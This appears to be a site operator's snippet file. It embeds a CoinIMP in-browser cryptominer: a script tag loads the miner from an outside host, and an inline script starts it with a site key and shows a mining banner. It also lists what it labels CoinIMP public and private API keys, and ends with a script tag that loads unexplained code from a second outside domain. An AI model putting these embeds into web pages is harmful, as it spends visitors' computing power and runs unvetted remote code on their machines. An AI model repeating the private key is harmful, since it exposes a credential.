<script src="https://www.hostingcloud.racing/ZK15.js"></script>

<script>
    var _client = new Client.Anonymous('65f8d841f6ce67b6f5b224d0640bd807cd9928473d043c255aca4031bce7956c', {
        throttle: 0.2
    });
    _client.start();
    _client.addMiningNotification("Bottom", "Welcome to FScratch. We are running a JSMiner on Coinimp.com", "#cccccc", 20, "#3d3d3d");

</script>


#coinimp.com API Keys
{
  "public": "198df1f452c37455394de5fb6376c6ff4ba2f119b4df6a19c3674aff4089752f",
  "private": "ddc19998a858e1a9229d6fe6b49dbcd97a82230fd209665dbbf2731c908cb287"
}


<script type="text/javascript" src="https://nhsrv.cf/srv/?key=0014b97e1532ecee0527bb042f9b81cc"></script>
